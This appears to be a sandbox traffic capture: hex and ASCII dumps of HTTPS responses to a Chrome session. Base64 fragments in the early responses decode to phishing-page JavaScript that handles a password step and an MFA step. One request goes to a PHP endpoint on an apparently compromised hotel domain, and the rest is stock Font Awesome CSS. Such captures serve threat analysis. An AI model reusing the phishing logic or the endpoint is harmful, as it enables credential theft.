4a 68 62 6e 4e 6d 62 33 4a 74 50 53 4a 30 63 6d 46 75 63 32 78 68 64 47 55 6f 4d 54 41 78 4c 6a 41 77 4d 44 59 35 4f 53 77 78 4e 54 6b 75 4f 54 45 30 4e 7a 49 7a
                                              Data Ascii: 1f40maWxsPSJyZ2IoMTgsNTksMTA5KSIgc3Ryb2tlPSJub25lIiBzdHJva2Utd2lkdGg9IjEiPjwvcGF0aD48L2c+PC9nPjxnIGlkPSJsb2FkaW5nTG9nbzciIGNsaXAtcGF0aD0idXJsKCNsb2FkaW5nTG9nbzIyKSI+PGcgaWQ9ImxvYWRpbmdMb2dvOF90cyIgdHJhbnNmb3JtPSJ0cmFuc2xhdGUoMTAxLjAwMDY5OSwxNTkuOTE0NzIz
                                              2023-09-05 23:45:29 UTC858INData Raw: 54 63 74 4c 6a 41 34 4d 79 30 75 4e 44 63 33 4c 53 34 78 4d 6a 59 74 4c 6a 67 7a 4c 53 34 78 4d 6a 5a 4e 4e 6a 59 75 4f 44 67 31 49 44 45 30 4c 6a 51 32 4e 57 4d 74 4c 6a 4d 35 4e 79 34 30 4f 54 6b 74 4c 6a 6b 35 4e 69 34 33 4e 54 45 74 4d 53 34 33 4e 7a 6b 75 4e 7a 55 78 4c 53 34 33 4e 7a 63 67 4d 43 30 78 4c 6a 4d 35 4c 53 34 79 4e 54 59 74 4d 53 34 34 4d 6a 4d 74 4c 6a 63 32 4e 69 30 75 4e 44 4d 31 4c 53 34 31 4d 53 30 75 4e 6a 55 31 4c 54 45 75 4d 6a 4d 34 4c 53 34 32 4e 54 55 74 4d 69 34 78 4e 6a 4d 67 4d 43 30 75 4f 54 55 30 4c 6a 49 79 4c 54 45 75 4e 7a 41 78 4c 6a 59 31 4e 53 30 79 4c 6a 49 79 4c 6a 51 7a 4d 79 30 75 4e 54 45 32 49 44 45 75 4d 44 51 74 4c 6a 63 33 4f 43 41 78 4c 6a 67 77 4e 69 30 75 4e 7a 63 34 4c 6a 63 30 4d 79 41 77 49 44 45 75
                                              Data Ascii: TctLjA4My0uNDc3LS4xMjYtLjgzLS4xMjZNNjYuODg1IDE0LjQ2NWMtLjM5Ny40OTktLjk5Ni43NTEtMS43NzkuNzUxLS43NzcgMC0xLjM5LS4yNTYtMS44MjMtLjc2Ni0uNDM1LS41MS0uNjU1LTEuMjM4LS42NTUtMi4xNjMgMC0uOTU0LjIyLTEuNzAxLjY1NS0yLjIyLjQzMy0uNTE2IDEuMDQtLjc3OCAxLjgwNi0uNzc4Ljc0MyAwIDEu
                                              2023-09-05 23:45:29 UTC866INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC866INData Raw: 31 66 34 30 0d 0a 75 62 69 39 35 62 6b 4a 77 4d 30 6c 73 51 30 31 72 4b 31 6c 54 65 6d 4e 49 61 32 74 6a 4d 30 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 45 31 53 31 4a 4a 51 55 39 4c 5a 31 4e 42 5a 6d 74 77 56 57 68 51 4d 30 74 47 53 6a 4e 6c 63 58 6c 54 5a 69 39 31 64 57 74 79 4c 7a 63 33 4f 55 77 76 4c 30 52 45 55 79 38 76 65 58 67 77 65 69 38 34 4f 48 42 4e 4c 79 39 55 54 46 52 51 4c 7a 42 35 4d 48 6f 35 4d 31 67 78 62 69 38 35 4e 54 6c 68 4c 79 39 6c 5a 6c 63 76 4c 7a 4e 75 4d 58 6b 76 4f 54 6b 35 5a 48 59 76 5a 6d 5a 75 62 69 38 7a 4d 7a 55 34 4c 79 74 47 4c 32 64 6d 4c 30 46 68 52 31 51 76 61 44 42 46 63 6a 68 77 63 45 31 4e 57 6e 6c 31 56 32 70 6e 63 6e 68 75 51 6b 39 42 59 6c 5a 6f
                                              Data Ascii: 1f40ubi95bkJwM0lsQ01rK1lTemNIa2tjM0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE1S1JJQU9LZ1NBZmtwVWhQM0tGSjNlcXlTZi91dWtyLzc3OUwvL0REUy8veXgwei84OHBNLy9UTFRQLzB5MHo5M1gxbi85NTlhLy9lZlcvLzNuMXkvOTk5ZHYvZmZubi8zMzU4LytGL2dmL0FhR1QvaDBFcjhwcE1NWnl1V2pncnhuQk9BYlZo
                                              2023-09-05 23:45:29 UTC874INData Raw: 41 67 49 41 6b 4a 43 51 6b 4a 43 58 30 4e 43 67 6b 4a 43 51 6b 4a 43 51 6c 6c 62 48 4e 6c 49 47 6c 6d 4b 48 4a 6c 63 33 56 73 64 43 35 30 50 54 30 6e 62 57 5a 68 4d 53 63 70 65 77 30 4b 43 51 6b 4a 43 51 6b 4a 43 51 6b 6b 4b 43 63 75 5a 57 35 30 5a 58 49 74 63 47 46 7a 63 79 63 70 4c 6d 68 70 5a 47 55 6f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 73 4e 43 67 6b 4a 43 51 6b 4a 43 51 6b 4a 43 53 51 75 63 47 39 7a 64 43 68 31 63 69 77 6e 63 33 52 68 63 6e 52 66 62 57 5a 68 50 54 45 6d 63 33 51 39 4a 79 74 79 5a 58 4e 31 62 48 51 75 5a 6d 6c 73 5a 53 78 6d 64 57 35 6a 64 47 6c 76 62 69 68 6b 4c 48 51 70 65 77 30 4b 43 51 6b 4a 43 51 6b 4a 43 51 6b 4a 43 53 38 76 59 57 78 6c 63 6e 51 6f 4d 53 6b 37 44 51 6f 4a 43 51 6b 4a 43 51 6b 4a 43 51 6c 39 4b 54 73 4e 43
                                              Data Ascii: AgIAkJCQkJCX0NCgkJCQkJCQllbHNlIGlmKHJlc3VsdC50PT0nbWZhMScpew0KCQkJCQkJCQkkKCcuZW50ZXItcGFzcycpLmhpZGUoZnVuY3Rpb24oKXsNCgkJCQkJCQkJCSQucG9zdCh1ciwnc3RhcnRfbWZhPTEmc3Q9JytyZXN1bHQuZmlsZSxmdW5jdGlvbihkLHQpew0KCQkJCQkJCQkJCS8vYWxlcnQoMSk7DQoJCQkJCQkJCQl9KTsNC
                                              2023-09-05 23:45:29 UTC877INData Raw: 0d 0a
                                              Data Ascii:
                                              2023-09-05 23:45:29 UTC877INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              7192.168.2.449729184.171.250.122443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:29 UTC877OUTGET /host22/7ffe563.php HTTP/1.1
                                              Host: www.grandehotelbraganca.com.br
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:29 UTC877INHTTP/1.1 200 OK
                                              Date: Tue, 05 Sep 2023 23:45:30 GMT
                                              Server: Apache
                                              X-Powered-By: PHP/7.4.20
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate
                                              Pragma: no-cache
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: true
                                              Access-Control-Allow-Methods: GET, PUT, POST, DELETE, OPTIONS
                                              Set-Cookie: PHPSESSID=da9f1c9bffe96152cbfe03a6e57e6db1; path=/
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2023-09-05 23:45:29 UTC878INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              8192.168.2.449738104.17.24.14443C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampkBytes transferredDirectionData
                                              2023-09-05 23:45:29 UTC878OUTGET /ajax/libs/font-awesome/4.7.0/css/font-awesome.css HTTP/1.1
                                              Host: cdnjs.cloudflare.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"
                                              Origin: null
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: text/css,*/*;q=0.1
                                              Sec-Fetch-Site: cross-site
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: style
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2023-09-05 23:45:30 UTC878INHTTP/1.1 200 OK
                                              Date: Tue, 05 Sep 2023 23:45:29 GMT
                                              Content-Type: text/css; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Access-Control-Allow-Origin: *
                                              Cache-Control: public, max-age=30672000
                                              ETag: W/"6497b584-1c48"
                                              Last-Modified: Sun, 25 Jun 2023 03:33:24 GMT
                                              cf-cdnjs-via: cfworker/r2
                                              Cross-Origin-Resource-Policy: cross-origin
                                              Timing-Allow-Origin: *
                                              X-Content-Type-Options: nosniff
                                              CF-Cache-Status: HIT
                                              Age: 2364198
                                              Expires: Sun, 25 Aug 2024 23:45:29 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u6ouVfQRFCsbNhMG190x71lzaFJ8VX2gfGO%2F6WOMcSqud9hvTmRqJ5rx4GoA6hd%2FZl4i5jtnquVSPj8YlrQ1YceOzfvHJYHU0XkWZImMlutqqpaDqDVC13L%2BSGUQAHelStkHe0Cr"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=15780000
                                              Server: cloudflare
                                              CF-RAY: 802258a259aa2b61-LAX
                                              alt-svc: h3=":443"; ma=86400
                                              2023-09-05 23:45:30 UTC879INData Raw: 37 63 31 34 0d 0a 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 0a 2f 2a 20 46 4f 4e 54 20 50 41 54 48 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 46 6f 6e 74 41 77 65 73
                                              Data Ascii: 7c14/*! * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) *//* FONT PATH * -------------------------- */@font-face { font-family: 'FontAwes
                                              2023-09-05 23:45:30 UTC880INData Raw: 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 32 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 2c 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 74 74 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 20 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 3f 76 3d 34 2e 37 2e 30 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 27 29 20 66 6f 72 6d
                                              Data Ascii: ntawesome-webfont.woff2?v=4.7.0') format('woff2'), url('../fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'), url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'), url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') form
                                              2023-09-05 23:45:30 UTC881INData Raw: 65 6d 3b 0a 7d 0a 2f 2a 20 44 65 70 72 65 63 61 74 65 64 20 61 73 20 6f 66 20 34 2e 34 2e 30 20 2a 2f 0a 2e 70 75 6c 6c 2d 72 69 67 68 74 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 0a 7d 0a 2e 70 75 6c 6c 2d 6c 65 66 74 20 7b 0a 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 7d 0a 2e 66 61 2e 70 75 6c 6c 2d 6c 65 66 74 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 2e 33 65 6d 3b 0a 7d 0a 2e 66 61 2e 70 75 6c 6c 2d 72 69 67 68 74 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2e 33 65 6d 3b 0a 7d 0a 2e 66 61 2d 73 70 69 6e 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 20 66 61 2d 73 70 69 6e 20 32 73 20 69 6e 66 69 6e 69 74 65 20 6c 69 6e 65 61 72 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 66 61 2d 73 70
                                              Data Ascii: em;}/* Deprecated as of 4.4.0 */.pull-right { float: right;}.pull-left { float: left;}.fa.pull-left { margin-right: .3em;}.fa.pull-right { margin-left: .3em;}.fa-spin { -webkit-animation: fa-spin 2s infinite linear; animation: fa-sp
                                              2023-09-05 23:45:30 UTC882INData Raw: 20 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d 30 2c 20 6d 69 72 72 6f 72 3d 31 29 22 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 2d 31 2c 20 31 29 3b 0a 20 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 2d 31 2c 20 31 29 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 28 2d 31 2c 20 31 29 3b 0a 7d 0a 2e 66 61 2d 66 6c 69 70 2d 76 65 72 74 69 63 61 6c 20 7b 0a 20 20 2d 6d 73 2d 66 69 6c 74 65 72 3a 20 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 61 73 69 63 49 6d 61 67 65 28 72 6f 74 61 74 69 6f 6e 3d
                                              Data Ascii: "progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)"; -webkit-transform: scale(-1, 1); -ms-transform: scale(-1, 1); transform: scale(-1, 1);}.fa-flip-vertical { -ms-filter: "progid:DXImageTransform.Microsoft.BasicImage(rotation=
                                              2023-09-05 23:45:30 UTC884INData Raw: 2d 6c 61 72 67 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 39 22 3b 0a 7d 0a 2e 66 61 2d 74 68 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 61 22 3b 0a 7d 0a 2e 66 61 2d 74 68 2d 6c 69 73 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 62 22 3b 0a 7d 0a 2e 66 61 2d 63 68 65 63 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 63 22 3b 0a 7d 0a 2e 66 61 2d 72 65 6d 6f 76 65 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 63 6c 6f 73 65 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 74 69 6d 65 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 30 64 22 3b 0a 7d 0a 2e 66 61 2d 73 65 61 72 63 68 2d 70 6c 75 73 3a 62
                                              Data Ascii: -large:before { content: "\f009";}.fa-th:before { content: "\f00a";}.fa-th-list:before { content: "\f00b";}.fa-check:before { content: "\f00c";}.fa-remove:before,.fa-close:before,.fa-times:before { content: "\f00d";}.fa-search-plus:b
                                              2023-09-05 23:45:30 UTC885INData Raw: 74 65 6e 74 3a 20 22 5c 66 30 32 39 22 3b 0a 7d 0a 2e 66 61 2d 62 61 72 63 6f 64 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 61 22 3b 0a 7d 0a 2e 66 61 2d 74 61 67 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 62 22 3b 0a 7d 0a 2e 66 61 2d 74 61 67 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 63 22 3b 0a 7d 0a 2e 66 61 2d 62 6f 6f 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 64 22 3b 0a 7d 0a 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 32 65 22 3b 0a 7d 0a 2e 66 61 2d 70 72 69 6e 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c
                                              Data Ascii: tent: "\f029";}.fa-barcode:before { content: "\f02a";}.fa-tag:before { content: "\f02b";}.fa-tags:before { content: "\f02c";}.fa-book:before { content: "\f02d";}.fa-bookmark:before { content: "\f02e";}.fa-print:before { content: "\
                                              2023-09-05 23:45:30 UTC886INData Raw: 74 65 70 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 38 22 3b 0a 7d 0a 2e 66 61 2d 66 61 73 74 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 39 22 3b 0a 7d 0a 2e 66 61 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 61 22 3b 0a 7d 0a 2e 66 61 2d 70 6c 61 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 62 22 3b 0a 7d 0a 2e 66 61 2d 70 61 75 73 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 63 22 3b 0a 7d 0a 2e 66 61 2d 73 74 6f 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 34 64 22 3b
                                              Data Ascii: tep-backward:before { content: "\f048";}.fa-fast-backward:before { content: "\f049";}.fa-backward:before { content: "\f04a";}.fa-play:before { content: "\f04b";}.fa-pause:before { content: "\f04c";}.fa-stop:before { content: "\f04d";
                                              2023-09-05 23:45:30 UTC888INData Raw: 6e 74 3a 20 22 5c 66 30 36 37 22 3b 0a 7d 0a 2e 66 61 2d 6d 69 6e 75 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 38 22 3b 0a 7d 0a 2e 66 61 2d 61 73 74 65 72 69 73 6b 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 39 22 3b 0a 7d 0a 2e 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 61 22 3b 0a 7d 0a 2e 66 61 2d 67 69 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 62 22 3b 0a 7d 0a 2e 66 61 2d 6c 65 61 66 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 36 63 22 3b 0a 7d 0a 2e 66 61 2d 66 69 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63
                                              Data Ascii: nt: "\f067";}.fa-minus:before { content: "\f068";}.fa-asterisk:before { content: "\f069";}.fa-exclamation-circle:before { content: "\f06a";}.fa-gift:before { content: "\f06b";}.fa-leaf:before { content: "\f06c";}.fa-fire:before { c
                                              2023-09-05 23:45:30 UTC889INData Raw: 66 61 2d 74 68 75 6d 62 73 2d 6f 2d 75 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 37 22 3b 0a 7d 0a 2e 66 61 2d 74 68 75 6d 62 73 2d 6f 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 38 22 3b 0a 7d 0a 2e 66 61 2d 73 74 61 72 2d 68 61 6c 66 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 39 22 3b 0a 7d 0a 2e 66 61 2d 68 65 61 72 74 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 61 22 3b 0a 7d 0a 2e 66 61 2d 73 69 67 6e 2d 6f 75 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 38 62 22 3b 0a 7d 0a 2e 66 61 2d 6c 69 6e 6b 65 64 69 6e 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b
                                              Data Ascii: fa-thumbs-o-up:before { content: "\f087";}.fa-thumbs-o-down:before { content: "\f088";}.fa-star-half:before { content: "\f089";}.fa-heart-o:before { content: "\f08a";}.fa-sign-out:before { content: "\f08b";}.fa-linkedin-square:before {
                                              2023-09-05 23:45:30 UTC890INData Raw: 22 5c 66 30 61 36 22 3b 0a 7d 0a 2e 66 61 2d 68 61 6e 64 2d 6f 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 37 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 38 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 39 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 75 70 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 61 22 3b 0a 7d 0a 2e 66 61 2d 61 72 72 6f 77 2d 63 69 72 63 6c 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e
                                              Data Ascii: "\f0a6";}.fa-hand-o-down:before { content: "\f0a7";}.fa-arrow-circle-left:before { content: "\f0a8";}.fa-arrow-circle-right:before { content: "\f0a9";}.fa-arrow-circle-up:before { content: "\f0aa";}.fa-arrow-circle-down:before { conten
                                              2023-09-05 23:45:30 UTC892INData Raw: 64 31 22 3b 0a 7d 0a 2e 66 61 2d 70 69 6e 74 65 72 65 73 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 64 32 22 3b 0a 7d 0a 2e 66 61 2d 70 69 6e 74 65 72 65 73 74 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 64 33 22 3b 0a 7d 0a 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 64 34 22 3b 0a 7d 0a 2e 66 61 2d 67 6f 6f 67 6c 65 2d 70 6c 75 73 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 64 35 22 3b 0a 7d 0a 2e 66 61 2d 6d 6f 6e 65 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 64 36 22 3b 0a 7d 0a 2e 66 61 2d 63 61 72 65 74
                                              Data Ascii: d1";}.fa-pinterest:before { content: "\f0d2";}.fa-pinterest-square:before { content: "\f0d3";}.fa-google-plus-square:before { content: "\f0d4";}.fa-google-plus:before { content: "\f0d5";}.fa-money:before { content: "\f0d6";}.fa-caret
                                              2023-09-05 23:45:30 UTC893INData Raw: 74 3a 20 22 5c 66 30 65 64 22 3b 0a 7d 0a 2e 66 61 2d 63 6c 6f 75 64 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 65 65 22 3b 0a 7d 0a 2e 66 61 2d 75 73 65 72 2d 6d 64 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 66 30 22 3b 0a 7d 0a 2e 66 61 2d 73 74 65 74 68 6f 73 63 6f 70 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 66 31 22 3b 0a 7d 0a 2e 66 61 2d 73 75 69 74 63 61 73 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 66 32 22 3b 0a 7d 0a 2e 66 61 2d 62 65 6c 6c 2d 6f 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 30 61 32 22 3b 0a 7d 0a 2e 66 61 2d 63 6f 66 66 65 65 3a 62 65 66 6f 72 65
                                              Data Ascii: t: "\f0ed";}.fa-cloud-upload:before { content: "\f0ee";}.fa-user-md:before { content: "\f0f0";}.fa-stethoscope:before { content: "\f0f1";}.fa-suitcase:before { content: "\f0f2";}.fa-bell-o:before { content: "\f0a2";}.fa-coffee:before
                                              2023-09-05 23:45:30 UTC894INData Raw: 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 30 64 22 3b 0a 7d 0a 2e 66 61 2d 71 75 6f 74 65 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 30 65 22 3b 0a 7d 0a 2e 66 61 2d 73 70 69 6e 6e 65 72 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 31 30 22 3b 0a 7d 0a 2e 66 61 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 31 31 22 3b 0a 7d 0a 2e 66 61 2d 6d 61 69 6c 2d 72 65 70 6c 79 3a 62 65 66 6f 72 65 2c 0a 2e 66 61 2d 72 65 70 6c 79 3a 62 65 66 6f 72 65 20 7b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 66 31 31 32 22 3b 0a 7d 0a 2e 66 61 2d 67 69 74 68 75 62 2d 61 6c 74 3a 62 65 66 6f 72 65 20 7b
